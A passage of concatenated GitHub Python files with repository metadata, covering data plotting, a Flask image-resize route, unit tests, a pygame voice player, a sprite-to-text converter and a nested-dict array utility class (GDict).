if not np.isnan(data).any():
valid_files.append(file)
except:
pass
data = np.array(valid_files)
# print(data)
specs = []
threads = []
for d in data:
x = threading.Thread(target=find_peak, args=(d, (-0.03, 0.01), False,))
threads.append(x)
for thread in threads:
thread.start()
thread.join()
print('End processing')
# for r in results:
# print(f"{r}: {results[r]}")
df = pd.DataFrame({'files': results.keys(), 'values': results.values(), 'sigmas': sigmas.values()})
df.to_csv('testfluxes.csv')
print(df)
|
mattcarv/RadioCUBE
|
SingleGaussianFitting.py
|
SingleGaussianFitting.py
|
py
| 2,424 |
python
|
en
|
code
| 0 |
github-code
|
6
|
16016777996
|
from scarf import app
from core import SiteImage, NoImage
from main import page_not_found, PageData
import core
from StringIO import StringIO
from PIL import Image
from flask import send_file
import logging
import base64
import cStringIO
logger = logging.getLogger(__name__)
""" image resizing is implemented via nginx on hosted instances, this stuff is just for dev """
def serve_pil_image(pil_img):
img_io = StringIO()
pil_img.save(img_io, 'PNG', quality=70)
img_io.seek(0)
return send_file(img_io, mimetype='image/png')
def resize(image_string, maxwidth, maxheight):
img = Image.open(image_string)
hsize = img.size[0]
vsize = img.size[1]
factor = 1
if hsize > maxwidth or vsize > maxheight:
hfactor = 1
if hsize > maxwidth:
if vsize < hsize:
hfactor = maxheight / vsize
else:
hfactor = maxwidth / hsize
vfactor = 1
if vsize > maxheight:
if vsize > hsize:
vfactor = maxheight / vsize
else:
vfactor = maxwidth / hsize
if vfactor < hfactor:
factor = vfactor
else:
factor = hfactor
return img.resize((int(hsize * factor), int(vsize * factor)), Image.ANTIALIAS)
@app.route('/resize/<size>/<img_id>')
def resize_image(size, img_id):
try:
logger.info('resize fallback URL called for imgid {} - {}'.format(img_id, size))
simg = SiteImage.create(img_id)
image_string = cStringIO.StringIO(base64.b64decode(simg.image))
(x, y) = size.split('x')
img = resize(image_string, float(x), float(y))
return serve_pil_image(img)
except (IOError, NoImage, ValueError):
return page_not_found(404)
|
oamike/scarfage
|
scarf/resize.py
|
resize.py
|
py
| 1,777 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4970666838
|
import csv
import matplotlib.pyplot as plt
from datetime import datetime
file_2 = 'data/sitka_weather_2018_simple.csv'
with open(file_2) as f:
reader = csv.reader(f)
header_row = next(reader)
dates, highs, lows = [], [], []
for x in reader:
high = round(((int(x[5]) - 32) * (5/9)),0)
date = datetime.strptime(x[2], '%Y-%m-%d')
low = round(((int(x[6]) - 32) * (5/9)),0)
highs.append(high)
lows.append(low)
dates.append(date)
plt.style.use('seaborn')
# fig, ax = plt.subplots(figsize=(10, 6), dpi=128)
fig, ax = plt.subplots(figsize=(5,3))
ax.plot(dates, highs, c='crimson', alpha=0.6)
ax.plot(dates, lows, c='turquoise', alpha=0.6)
ax.fill_between(dates, highs, lows, facecolor='royalblue', alpha=0.2)
ax.set_title('Daily high and low temperatures of 2018', fontsize = 12)
ax.set_xlabel('Date', fontsize = 10)
fig.autofmt_xdate()
ax.set_ylabel('Temperature (°C)', fontsize = 10)
ax.tick_params(axis='both', which='major', labelsize=8)
plt.show()
fig.savefig('../../outputs/downloading data/sitka_temp.png', bbox_inches = 'tight')
|
RaulMaya/Data-Visualization
|
python_programs/downloading data/sitka_temperatures.py
|
sitka_temperatures.py
|
py
| 1,108 |
python
|
en
|
code
| 0 |
github-code
|
6
|
14911244486
|
import unittest
import time
import ddt
import json
from Public.cogfig import EXECL_PATH
from Interface.test_mock import test_mock_mi
test_send = test_mock_mi()
import math
from Public.read_excel import read_excel
from unittest import mock
wenjian = EXECL_PATH + '\\jekn.xlsx' #查询到对应的case文件
index_excel = read_excel(wenjian, '指数价')
#上一次指数价
last_prices=9409.9
@ddt.ddt()
class TestClient(unittest.TestCase):
def test_fail_request(self,test):
# #调用方法实例化,f获得test_send的实例
# f=test_send.test_send_requestr()
# #把返回值作为mock,mock
# f=mock.Mock(return_value='404')
# #调用属性实例化
# print(type(f))
# self.assertEqual(f(), '404')
#指数价
#统计
sum = 0
#金额不为0的用户,保存进入prices
prices = []
for i in range(len(test)):
if float(test[i]) > 0:
sum += float(test[i])
prices.append(test[i])
num = len(prices)
#记录prices的总长度等于0直接返回0
if num == 0:
return 0
##记录prices的总长度等于1
elif num == 1:
global last_prices
# 计算当前价格-上一次的价格/上一次的价格是否大于0.25
if math.fabs(float(prices[0]) - float(last_prices)) / float(last_prices) > 0.25:
# 直接返回上一次的价格,因为跑出来的指数价格跟上一次的指数价格差距太大
return last_prices
else:
# 返回当前的指数价格
prices[0]
##记录prices的总长度等于2
elif num == 2:
#计算prices的第一个数值减去第二个数组
dp = float(prices[0]) - float(prices[1])
#计算出来的第一个数值减去第二个数组的总值是否小于0
if dp <= 0: #dp小于0是正常的
#1、把总值转成整数
#2、判断总值/价格1>0.25
if -dp / float(prices[0]) > 0.25: #如果值大于0.25就是异常
#价格1-上一次价格<=价格2-上一次价格
if math.fabs(float(prices[0]) - last_prices) <= math.fabs(float(prices[1]) - last_prices):
print(prices[0])
#直接返回价格1
return prices[0]
else:
#返回价格2
return prices[1]
else:
#总的价格/平均价
index = sum / float(num)
print("指数价", index)
last_prices= index
return index
else:
#
if dp / float(prices[1]) > 0.25:
if math.fabs(prices[0] - last_prices) <= math.fabs(prices[1] - last_prices):
return prices[0]
else:
return prices[1]
else:
return sum / float(num)
#数组里面有三个价格
avg = sum / float(num)
#记录异常的价格
nums = 0
for i in range(len(prices)):
dv = math.fabs((float(prices[i]) - avg) / avg)
print(dv)
if dv > 0.03:
nums += 1
prices[i] = 0
if nums == 0:
print(nums)
return avg
return self.test_fail_request(prices)
# #正常的数值
# def test_1_average_value(self):
# s=1
# while True:
# if s <= 1:
# test = test_send.test_send_requestr()
# # if r_binance
# print(test)
#
# price = self.test_fail_request(test)
# print('指数值', price)
# if price > 0:
# last_prices = price
# time.sleep(0.5)
# s += 1
# else:
# break
#指标表价只有一个值
@ddt.data(*index_excel.next())
def test_2_to_value(self,data):
s=1
test_list = data['指数价']
while True:
if s <= 1:
test = test_send.test_send_requestr()
print("分割", type(test_list))
last_list=test_list.split(',')
print("分割",type(last_list))
price_list=[]
#计算取出来的值,若取出来的值偏差大于0.25,就返回上一次的指数价
for i in range(0,len(last_list)):
global last_prices
f=math.fabs(float(last_prices) - float(last_list[i])) / float(last_prices)
print(f)
if f> 0.25:
price_list.append(0)
else:
#last_prices = last_list[i]
price_list.append(last_list[i])
test = mock.Mock(return_value=price_list)
# #调用属性实例化
test_list=test()
price = self.test_fail_request(test_list)
print('指数值',price)
time.sleep(0.5)
if float(price)>0:
last_prices = price
s += 1
else:
break
if __name__ == '__main__':
unittest.main()
|
LiuYaowei-Geek/deep
|
test_Case/mock.py
|
mock.py
|
py
| 5,537 |
python
|
zh
|
code
| 1 |
github-code
|
6
|
71484374908
|
S = input()
N = len(S)
non_x = []
s_notx = []
for i, s in enumerate(S):
if s != 'x':
non_x.append(i)
s_notx.append(s)
s_notx = ''.join(s_notx)
if s_notx != s_notx[::-1]:
print(-1)
quit()
if not non_x:
print(0)
quit()
ans = 0
L = len(non_x)
if L % 2 == 0:
left, right = L // 2 - 1, L // 2
else:
left = right = L // 2
left, right = left - 1, right + 1
for i in range(left + 1):
l, r = left - i, right + i
ans += abs((non_x[l + 1] - non_x[l]) - (non_x[r] - non_x[r - 1]))
ans += abs(non_x[0] - (N - non_x[-1] - 1))
print(ans)
|
knuu/competitive-programming
|
atcoder/corp/cf17_qc_c.py
|
cf17_qc_c.py
|
py
| 575 |
python
|
en
|
code
| 1 |
github-code
|
6
|
16669920694
|
from django.contrib.auth import get_user_model
from django.test import TestCase
from ..models import Comment, Follow, Group, Post
User = get_user_model()
class PostModelTest(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user = User.objects.create_user(username='TestUsername')
cls.author = User.objects.create_user(username='TestAuthor')
cls.group = Group.objects.create(
title='Тестовая группа',
slug='test-slug',
description='Тестовое описание',
)
cls.post = Post.objects.create(
author=cls.user,
text='Тестовый пост',
)
cls.comment = Comment.objects.create(
text='Тестовый комментарий',
author=cls.user,
post_id=cls.post.id
)
cls.follow = Follow.objects.create(
user=cls.user,
author=cls.author
)
def test_models_Post_have_correct_object_names(self):
"""Проверяем, что у модели Post корректно работает __str__."""
post = PostModelTest.post
expected_object_name = post.text[:15]
self.assertEqual(expected_object_name, str(post))
def test_models_Group_have_correct_object_names(self):
"""Проверяем, что у модели Group корректно работает __str__."""
group = PostModelTest.group
expected_object_name = group.title
self.assertEqual(expected_object_name, str(group))
def test_models_Comment_have_correct_object_names(self):
"""Проверяем, что у модели Group корректно работает __str__."""
comment = PostModelTest.comment
expected_object_name = comment.text
self.assertEqual(expected_object_name, str(comment))
def test_models_Follow_have_correct_object_names(self):
"""Проверяем, что у модели Group корректно работает __str__."""
follow = PostModelTest.follow
expected_object_name = str(follow.author)
self.assertEqual(expected_object_name, str(follow))
|
Vilenor/hw05_final
|
yatube/posts/tests/test_models.py
|
test_models.py
|
py
| 2,247 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
33087525996
|
import pygame
from speedfighter.utils.app_base import AppBase
from speedfighter.utils.file import File
from speedfighter.utils.path import Path
class SpeedSpeaker(AppBase):
"""
スピードスピーカー
"""
def __init__(self):
super().__init__()
pygame.mixer.init()
pygame.mixer.music.set_volume(1.0)
@property
def is_busy(self) -> bool:
"""
音声を再生中かどうか
"""
return pygame.mixer.music.get_busy()
def play_sound(self, file_path: str):
"""
音声を再生する
Parameters
----------
file_path : str
音声ファイルのパス
"""
if File.exists(file_path):
pygame.mixer.music.load(file_path)
pygame.mixer.music.play()
while pygame.mixer.music.get_busy():
pygame.time.wait(100) # ms
# self._logger.info("Playing...")
# self._logger.info("Finished.")
else:
self._logger.error("Sound file not found. {}".format(file_path))
def speak_number(self, number: int):
"""
数字を読み上げる
Parameters
----------
number : int
数字
"""
file_path = Path.join(
self.project_root_dir_path, "assets/voice/number/{:0=3}.mp3".format(number)
)
self.play_sound(file_path)
def speak_alphabet(self, alphabet: str):
"""
アルファベットを読み上げる
Parameters
----------
alphabet : str
アルファベット
"""
file_path = Path.join(
self.project_root_dir_path, "assets/voice/alphabet/{}.mp3".format(alphabet)
)
self.play_sound(file_path)
def speak_text(self, text: str):
"""
テキストを読み上げる
Parameters
----------
text : str
テキスト
"""
file_path = Path.join(
self.project_root_dir_path, "assets/voice/text/{}.mp3".format(text)
)
self.play_sound(file_path)
|
curio184/speedfighter-nft
|
speedfighter/speed_monitor/speed_speaker.py
|
speed_speaker.py
|
py
| 2,159 |
python
|
en
|
code
| 1 |
github-code
|
6
|
3028976536
|
'''
Description: Converts Gen I pokemon sprites to text for pokemonBatch
Author: Soda Adlmayer
Date: 2017.02.26
'''
from PIL import Image
#set filepath
filename = r"C:\Users\Rudi\Documents\SODA\BATCH\pokemonBatch\data\other\sprites\bulbasaur1.png"
#open image
im = Image.open(filename)
width, height = im.size
#set variables
n = 1
list1 = []
list2 = []
#loop rows
while n <= height:
#empty lists
del list1[:]
del list2[:]
#loop columns
for i in range (width):
xy = (i, n)
px = im.getpixel(xy)
#append pixel value to array
list1.append(px)
#choose text value based on pixel value
if list1[i] == 255:
list2.append(' ')
if list1[i] == 170:
list2.append('°')
if list1[i] == 85:
list2.append('±')
if list1[i] == 0:
list2.append('²')
#write to text file
f = open("BULBASAUR_frontSprite.txt", 'a')
print(*list2, sep='', file=f)
#progres n
n += 1
|
Pokeconomist/pokemonBatch
|
assets/sprites/image_processor1.py
|
image_processor1.py
|
py
| 963 |
python
|
en
|
code
| 3 |
github-code
|
6
|
5479399707
|
"""
TODO: Merge or improved with pytree in jax.
"""
from collections import defaultdict
import numpy as np
from functools import wraps
from multiprocessing.shared_memory import SharedMemory
from .array_ops import (
squeeze,
unsqueeze,
zeros_like,
repeat,
tile,
shuffle,
take,
share_memory,
concat,
stack,
arr_mean,
to_item,
select_with_mask,
recover_with_mask,
detach,
get_nbytes,
split,
batch_shuffle,
decode_np,
to_two_dims,
to_list,
gather,
reshape,
transpose,
contiguous,
split_dim,
to_item,
to_cpu,
to_cuda,
allreduce,
slice_item,
deepcopy,
)
from .converter import as_dtype, to_np, to_torch, slice_to_range, to_array
from .type_utils import get_dtype, is_list_of, is_dict, is_h5, is_arr, is_num, is_np, is_str
SMM, use_shared_mem = None, False
def create_smm():
global SMM, use_shared_mem
if not use_shared_mem:
from multiprocessing.managers import SharedMemoryManager
use_shared_mem = True
SMM = SharedMemoryManager()
SMM.start()
def delete_smm():
global SMM, use_shared_mem
if use_shared_mem:
use_shared_mem = False
SMM.shutdown()
def replace_empty_with_none(*args):
args = list(args)
for i, x in enumerate(args):
if x is not None and isinstance(x, (list, dict)) and len(x) == 0:
x = None
args[i] = x
return args
def count_none(*args):
ret = 0
for _ in list(args):
if _ is None:
ret += 1
return ret
def get_first_not_none(*args):
for _ in list(args):
if _ is not None:
return _
return None
class GDict:
"""
Generalized Dict(GDict)
Unified interface for dict, single element, HDF5 File.
GDict are defined with syntax:
GDict = GDict-Final | GDict-List | GDict-Dict
GDict-Final = Any object not with type list, tuple, dict
GDict-Dict or GDict-List = Dict or List of GDict
Examples:
1. GDict-Final:
1) np-array: x = np.zeros(100)
2) tensor: x = torch.tensor(100)
3) HDF5 File: x = File('tmp.h5', 'r')
4) Other python basic element: string, scalar, object.
3. GDict-Dict or GDict-List or GDict-Tuple:
GDict-Dict: x = {'0': {'b': np.zeros(100)}}
GDict-List: x = [{'b': np.zeros(100)}, ]
x['0/b'][0] = 1 (x['0/b/0'] is wrong!)
Rules:
1. No '\<>|:&?*"' in any keys (Compatible with filename rules in windows and unix)
'/' is used to separate two keys between two layers.
2. All integer key will be converted to string
3. tuple object will be converted to list
4. key does not contain any index in GDict-Final (See example 3)
5. Rules for converting a GDict object to HDF5
1) any number in keys of GDict-Dict will be converted to 'int_hdf5_' + number
2) For GDict-List, the list will be converted to a dict with key 'list_int_hdf5_' + number
3) GDict-Final:
1) torch.Tensor will be converted to numpy array when is saved as HDF5 File and cannot be recovered.
2) np.array will be saved as h5py.Dataset
3) h5py object will be deep copied.
4) other object will be serialized with pickle
More Examples:
>>> GDict(np.ones(3)).memory
array([1., 1., 1.])
>>> GDict(np.ones(3)).shape
3
>>> d={'a': np.ones([1,1]), 'b': np.ones([2,3])}
>>> GDict(d).memory
{'a': array([[1.]]), 'b': array([[1., 1., 1.],
[1., 1., 1.]])}
>>> GDict(d).shape
{'a': (1, 1), 'b': (2, 3)}
>>> l = [d,d]
>>> GDict(l).memory
[{'a': array([[1.]]), 'b': array([[1., 1., 1.],
[1., 1., 1.]])}, {'a': array([[1.]]), 'b': array([[1., 1., 1.],
[1., 1., 1.]])}]
>>> GDict(l).shape
[{'a': (1, 1), 'b': (2, 3)}, {'a': (1, 1), 'b': (2, 3)}]
"""
def __init__(self, item=None, faster=False, **kwargs):
self.memory = item if faster else self.to_item(item)
self.capacity = getattr(item, "capacity", None)
@classmethod
def _is_final(cls, item):
return not isinstance(item, (list, dict))
@classmethod
def to_item(cls, item):
if isinstance(item, GDict):
return cls.to_item(item.memory)
elif is_dict(item):
ret = {key: cls.to_item(item[key]) for key in item}
return ret
elif isinstance(item, (list, tuple)):
return [cls.to_item(x) for x in item]
else:
return item
@classmethod
def check_item(cls, item):
if isinstance(item, dict):
for key in item:
if not cls.check_item(item[key]):
return False
elif isinstance(item, list):
for x in item:
if not cls.check_item(x):
return False
elif isinstance(item, (tuple, GDict)):
return False
return True
@classmethod
def assert_item(cls, item):
assert cls.check_item(item), "Tuple and GDict should be missing in self.memory"
@classmethod
def _recursive_do_on_memory(cls, memory, function, new=True, ignore_list=False, *args, **kwargs):
"""Apply an operation to all elements in GDict. The operator can be functions in array_ops."""
if isinstance(memory, dict):
ret = {} if new else memory
for key, value in memory.items():
if cls._is_final(value):
ret[key] = function(value, *args, **kwargs)
else:
ret[key] = cls._recursive_do_on_memory(memory[key], function, new, ignore_list, *args, **kwargs)
return ret
elif isinstance(memory, list) and not ignore_list:
ret = [None for x in memory] if new else memory
for key, value in enumerate(memory):
if cls._is_final(value):
ret[key] = function(value, *args, **kwargs)
else:
ret[key] = cls._recursive_do_on_memory(memory[key], function, new, ignore_list, *args, **kwargs)
return ret
else:
return function(memory, *args, **kwargs)
@classmethod
def _recursive_do(cls, memory, function, new=True, wrapper=True, capacity=None, *args, **kwargs):
item = cls._recursive_do_on_memory(memory, function, new, *args, **kwargs)
return cls(item, capacity=capacity, faster=True) if wrapper else item
@classmethod
def _recursive_do_gdict(cls, memory, function, new=True, wrapper=True, *args, **kwargs):
item = cls._recursive_do_on_memory(memory, function, new, *args, **kwargs)
return GDict(item, faster=True) if wrapper else item
@classmethod
def _recursive_compare(cls, a, b, function):
if isinstance(a, dict):
inter_set = set(a.keys()) & set(b.keys())
for key in inter_set:
if not cls._recursive_compare(a[key], b[key], function):
return False
elif isinstance(a, list):
for i in range(min(len(a), len(b))):
if not cls._recursive_compare(a[i], b[i], function):
return False
else:
return function(a, b)
return True
@classmethod
def _get_item(cls, memory, keys):
if len(keys) == 0 or memory is None:
return memory
elif is_dict(memory):
key = keys[0]
return cls._get_item(memory.get(key, None), keys[1:])
elif is_list_of(memory):
key = eval(keys[0])
return cls._get_item(memory[key], keys[1:])
else:
print(f"Error! Keys should not cover the item in {type(memory)}, recent keys {keys}.")
@classmethod
def _set_item(cls, memory, keys, value):
if isinstance(memory, GDict):
memory = memory.memory
if len(keys) == 0:
return value
elif is_dict(memory):
key = keys[0]
memory[key] = cls._set_item(memory.get(key, None), keys[1:], value)
elif is_list_of(memory):
key = eval(keys[0])
if key > len(memory):
for i in range(key - len(memory) + 1):
memory.append(None)
memory[key] = cls._set_item(memory[key], keys[1:], value)
else:
print(f"Error! Keys should not cover the item in {type(memory)}, recent keys {keys}.")
return memory
@classmethod
def _update_memory(cls, target, other):
if is_list_of(target):
if len(other) > len(target):
for i in range(len(other) - len(target)):
target.append(None)
for i in range(len(other)):
target[i] = cls._update_memory(target[i], other[i])
elif is_dict(target):
for key in other:
target[key] = cls._update_memory(target.get(key, None), other[key])
else:
target = other
return target
def update(self, other):
if isinstance(other, GDict):
other = other.memory
self.memory = self._update_memory(self.memory, other)
def compatible(self, other):
if isinstance(other, GDict):
other = other.memory
def _compatible(a, b):
return type(a) == type(b)
return self._recursive_compare(self.memory, other, _compatible)
def shared_memory(self, other):
other = type(self)(other)
return self._recursive_compare(self.memory, other.memory, share_memory)
def copy(self, wrapper=True):
return self._recursive_do(self.memory, deepcopy, wrapper=wrapper)
def to_torch(self, use_copy=False, device="cpu", non_blocking=False, dtype=None, requires_grad=False, wrapper=True):
return self._recursive_do(
self.memory,
to_torch,
use_copy=use_copy,
device=device,
non_blocking=non_blocking,
dtype=dtype,
requires_grad=requires_grad,
wrapper=wrapper,
)
def to_array(self, wrapper=True):
return self._recursive_do(self.memory, to_array, wrapper=wrapper)
def to_numpy(self, use_copy=False, dtype=None, wrapper=True):
return self._recursive_do(self.memory, to_np, use_copy=use_copy, dtype=dtype, wrapper=wrapper)
def to_hdf5(self, file):
from maniskill2_learn.utils.file import dump_hdf5
dump_hdf5(self.memory, file)
@classmethod
def from_hdf5(cls, file, keys=None, wrapper=True):
from maniskill2_learn.utils.file import load_hdf5
ret = load_hdf5(file, keys)
if wrapper:
ret = cls(ret)
return ret
@property
def shape(self):
def get_shape(x):
shape = getattr(x, "shape", None)
if shape is not None and len(shape) == 1:
shape = shape[0]
return shape
return self._recursive_do_on_memory(self.memory, get_shape)
@property
def list_shape(self):
def get_shape(x):
shape = getattr(x, "shape", None)
if shape is not None and len(shape) == 1:
shape = shape[0]
else:
shape = list(shape) # For torch.Size
return shape
return self._recursive_do_on_memory(self.memory, get_shape)
@property
def type(self):
return self._recursive_do_on_memory(self.memory, type)
@property
def dtype(self):
return self._recursive_do_on_memory(self.memory, get_dtype)
@property
def nbytes(self):
return self._recursive_do_on_memory(self.memory, get_nbytes)
@property
def is_np(self):
return self._recursive_do_on_memory(self.memory, is_np)
@property
def is_np_all(self):
ret = self._flatten(self._recursive_do_on_memory(self.memory, is_np))
return np.alltrue([v for k, v in ret.items()]) if isinstance(ret, dict) else ret
@property
def nbytes_all(self):
ret = self._flatten(self._recursive_do_on_memory(self.memory, get_nbytes))
return sum([v for k, v in ret.items()]) if isinstance(ret, dict) else ret
@property
def is_big(self):
return self.nbytes_all / 1024 / 1024 > 1
@property
def device(self):
def get_device(x):
device = getattr(x, "device", None)
if device is not None:
device = f"{device.type}:{device.index}" if device.index is not None else f"{device.type}"
return device
return self._recursive_do_on_memory(self.memory, get_device)
def cpu(self, wrapper=True):
return self._recursive_do_gdict(self.memory, to_cpu, wrapper=wrapper)
def cuda(self, device="cuda", wrapper=True):
return self._recursive_do_gdict(self.memory, to_cuda, device=device, wrapper=wrapper)
def item(self, wrapper=True):
return self._recursive_do_gdict(self.memory, to_item, wrapper=wrapper)
def item(self, wrapper=True):
return self._recursive_do_gdict(self.memory, to_item, wrapper=wrapper)
def astype(self, dtype, wrapper=True):
return self._recursive_do(self.memory, as_dtype, dtype=dtype, wrapper=wrapper, capacity=self.capacity)
def float(self, wrapper=True):
return self.astype("float32", wrapper=wrapper)
def f64_to_f32(self, wrapper=True):
from .compression import f64_to_f32
return self._recursive_do(self.memory, f64_to_f32, wrapper=wrapper, capacity=self.capacity)
def squeeze(self, axis=None, wrapper=True):
return self._recursive_do(self.memory, squeeze, axis=axis, wrapper=wrapper)
def unsqueeze(self, axis, wrapper=True):
return self._recursive_do(self.memory, unsqueeze, axis=axis, wrapper=wrapper, capacity=self.capacity if axis != 0 else 1)
def detach(self, wrapper=True):
return self._recursive_do(self.memory, detach, wrapper=wrapper, capacity=self.capacity)
def to_zeros(self, wrapper=True):
return self._recursive_do(self.memory, zeros_like, wrapper=wrapper, capacity=self.capacity)
def repeat(self, rep, axis=None, wrapper=True):
return self._recursive_do(
self.memory, repeat, rep=rep, axis=axis, wrapper=wrapper, capacity=self.capacity if axis != 0 and axis is not None else None
)
def reshape(self, newshape, wrapper=True):
return self._recursive_do(self.memory, reshape, newshape=newshape, wrapper=wrapper, capacity=newshape)
def split_dim(self, axis, newaxes, wrapper=True):
assert isinstance(newaxes, (list, tuple))
return self._recursive_do(
self.memory, split_dim, axis=axis, newaxes=newaxes, wrapper=wrapper, capacity=self.capacity if axis != 0 else newaxes[0]
)
def transpose(self, axis0, axis1, contiguous=True, wrapper=True):
return self._recursive_do(
self.memory,
transpose,
axis0=axis0,
axis1=axis1,
contiguous=contiguous,
wrapper=wrapper,
capacity=self.capacity if 0 not in [axis0, axis1] else None,
)
def contiguous(self, wrapper=True):
return self._recursive_do(self.memory, contiguous, wrapper=wrapper, capacity=self.capacity)
def tile(self, rep, wrapper=True):
return self._recursive_do(self.memory, tile, rep=rep, wrapper=wrapper)
def mean(self, axis=None, keepdim=False, wrapper=True):
return self._recursive_do(
self.memory, arr_mean, axis=axis, keepdim=keepdim, wrapper=wrapper, capacity=self.capacity if axis != 0 and axis is not None else None
)
@classmethod
def _assign(cls, memory, indices, value, ignore_list=False):
if isinstance(value, tuple):
value = list(value)
if is_dict(memory):
assert type(memory) == type(value), f"{type(memory), type(value)}"
for key in memory:
if key in value:
memory[key] = cls._assign(memory[key], indices, value[key], ignore_list)
elif is_arr(memory):
assert type(memory) == type(value) or np.isscalar(value), f"{type(memory), type(value)}"
if share_memory(memory, value):
memory[indices] = deepcopy(value)
else:
memory[indices] = value
elif is_list_of(memory):
if ignore_list:
memory[indices] = value
else:
# if is_num(indices):
# memory[indices] = value if is_num(value) else value[indices]
# else:
# assert type(memory) == type(value), f"{type(memory), type(value)}"
for i in range(min(len(memory), len(value))):
memory[i] = cls._assign(memory[i], indices, value[i], ignore_list)
return memory
def assign_list(self, index, value):
if isinstance(value, GDict):
value = value.memory
assert is_num(index)
self.memory = self._assign(self.memory, index, value, True)
def to_two_dims(self, wrapper=True):
return self._recursive_do(self.memory, to_two_dims, wrapper=wrapper)
def take_list(self, index, wrapper=True):
assert is_num(index)
return self._recursive_do_gdict(self.memory, take, indices=index, axis=0, ignore_list=True, wrapper=wrapper)
def to_list(self, wrapper=True):
return self._recursive_do(self.memory, to_list, wrapper=wrapper)
def select_with_mask(self, mask, wrapper=True):
return self._recursive_do(self.memory, select_with_mask, mask=mask, wrapper=wrapper, capacity=to_item(mask.sum()))
def recover_with_mask(self, mask, wrapper=True):
return self._recursive_do(self.memory, select_with_mask, mask=mask, wrapper=wrapper, capacity=mask.shape[0])
def allreduce(self, op="MEAN", device="cuda", wrapper=True):
return self._recursive_do(self.memory, allreduce, op=op, device=device, wrapper=wrapper, capacity=self.capacity)
def to_gdict(self):
return GDict(self.memory, faster=True)
@property
def one_device(self):
return self._get_one_attr(self.memory, "device")
@property
def one_shape(self):
return self._get_one_attr(self.memory, "shape")
@property
def one_dtype(self):
return self._get_one_attr(self.memory, "dtype")
def _flatten(cls, memory, root_key="", full=True):
if is_dict(memory):
ret = {}
for key in memory:
ret.update(cls._flatten(memory[key], f"{root_key}/{key}", full))
elif is_list_of(memory) and (full or len(memory) > 10):
# Simplify flatten result for small list or tuple
ret = {}
for i in range(len(memory)):
ret.update(cls._flatten(memory[i], f"{root_key}/{i}", full))
else:
return memory if root_key == "" else {root_key.replace("//", "/"): memory}
return ret
def flatten(self, full=True):
return type(self)(self._flatten(self.memory, "", full))
@classmethod
def wrapper(cls, class_method=False):
if not class_method:
def decorator(func):
@wraps(func)
def wrapper(item, *args, **kwargs):
if isinstance(item, GDict):
return func(item, *args, **kwargs)
else:
return func(GDict(item), *args, **kwargs).memory
return wrapper
else:
def decorator(func):
@wraps(func)
def wrapper(self, item, *args, **kwargs):
if isinstance(item, GDict):
return func(self, item, *args, **kwargs)
else:
return func(self, GDict(item), *args, **kwargs).memory
return wrapper
return decorator
def select_by_keys(self, keys=None, to_list=False, wrapper=True):
def _dfs_select(memory, keys=None):
if keys is None:
return memory
if isinstance(memory, dict):
new_keys = {}
for key in keys:
fk = key[0]
if len(key) > 1:
if fk not in new_keys:
new_keys[fk] = []
new_keys[fk].append(key[1:])
else:
new_keys[fk] = None
return {key: _dfs_select(memory[key], new_keys[key]) for key in new_keys}
elif isinstance(memory, list):
new_keys = {}
for key in keys:
fk = eval(key[0]) if is_str(key[0]) else key[0]
if len(key) > 1:
if fk not in new_keys:
new_keys[fk] = []
new_keys[fk].append(key[1:])
else:
new_keys[fk] = None
return [_dfs_select(memory[key], new_keys[key]) for key in sorted(new_keys)]
else:
raise ValueError(f"{keys}")
if not isinstance(keys, (list, tuple)) and keys is not None:
keys = [keys]
single = True
else:
single = False
keys = [self._process_key(key) for key in keys]
memory = _dfs_select(self.memory, keys)
if to_list:
memory = type(self)(memory)
memory = [memory[key] for key in keys]
if single:
memory = memory[0]
if wrapper:
memory = type(self)(memory)
return memory
def take(self, indices, axis=0, wrapper=True): # will always copy data, needs double check
if is_num(indices):
return self._recursive_do_gdict(self.memory, take, indices=indices, axis=axis, wrapper=wrapper)
else:
if isinstance(indices, slice):
len_indices = len(slice_to_range(indices))
else:
len_indices = len(indices)
new_capacity = len_indices if axis == 0 else self.capacity
return self._recursive_do(self.memory, take, indices=indices, axis=axis, wrapper=wrapper, capacity=new_capacity)
def slice(self, slice, axis=0, wrapper=True): # no copy
return self._recursive_do(self.memory, slice_item, slice=slice, axis=axis, wrapper=wrapper)
def assign_all(self, value):
if isinstance(value, GDict):
value = value.memory
self.memory = self._assign(self.memory, slice(None, None, None), value)
@classmethod
def _do_on_list_of_array(cls, memories, function, **kwargs):
for i in range(len(memories)):
assert type(memories[i]) is type(memories[0]), f"{type(memories[i]), type(memories[0])}"
if isinstance(memories[0], (tuple, list)):
for i in range(len(memories)):
assert len(memories[i]) == len(memories[0])
ret = []
for i in range(len(memories[0])):
ret.append(cls._do_on_list_of_array([memories[j][i] for j in range(len(memories))], function, **kwargs))
elif isinstance(memories[0], dict):
for i in range(len(memories)):
assert set(memories[i].keys()) == set(memories[0].keys()), f"{set(memories[i].keys())}, {set(memories[0].keys())}"
ret = {}
for key in memories[0]:
ret[key] = cls._do_on_list_of_array([memories[j][key] for j in range(len(memories))], function, **kwargs)
else:
ret = function(memories, **kwargs)
return ret
@classmethod
def concat(cls, items, axis=0, wrapper=True):
ret = cls._do_on_list_of_array([_.memory if isinstance(_, GDict) else _ for _ in items], concat, axis=axis)
if wrapper:
capacity = 0
for item in items:
if isinstance(item, GDict) and item.capacity is not None:
capacity += item.capacity
else:
capacity = None
break
return cls(ret, capacity=capacity, faster=True)
else:
return ret
@classmethod
def stack(cls, items, axis=0, wrapper=True):
ret = cls._do_on_list_of_array([_.memory if isinstance(_, GDict) else _ for _ in items], stack, axis=axis)
if wrapper:
if axis == 0:
capacity = len(items)
else:
capacity = None
for item in items:
if isinstance(item, cls) and item.capacity is not None:
capacity = item.capacity
break
return cls(ret, capacity=capacity, faster=True)
else:
return ret
@classmethod
def _process_key(cls, key):
if is_num(key):
key = str(key)
return key if isinstance(key, (list, tuple)) else key.strip("/").replace("//", "/").split("/")
def __getitem__(self, key):
return self._get_item(self.memory, self._process_key(key))
def __setitem__(self, key, value):
self.memory = self._set_item(self.memory, self._process_key(key), value)
return self.memory
def __str__(self):
return str(self._flatten(self.memory, "", False))
def __dict__(self):
assert isinstance(self.memory, dict), "self.memory is not a dict!"
return self.memory
def __getattr__(self, key):
return getattr(self.memory, key)
def __contains__(self, key):
if "/" in key:
key = self._process_key(key)
memory = self.memory
for _ in key:
if _ not in memory:
return False
memory = memory[_]
return True
else:
return key in self.memory
def __delitem__(self, key):
keys = list(self._process_key(key))
last_memory = None
memory = self.memory
for i, key in enumerate(keys):
if isinstance(last_memory, list) and isinstance(key, str):
key = eval(key)
keys[i] = key
last_memory = memory
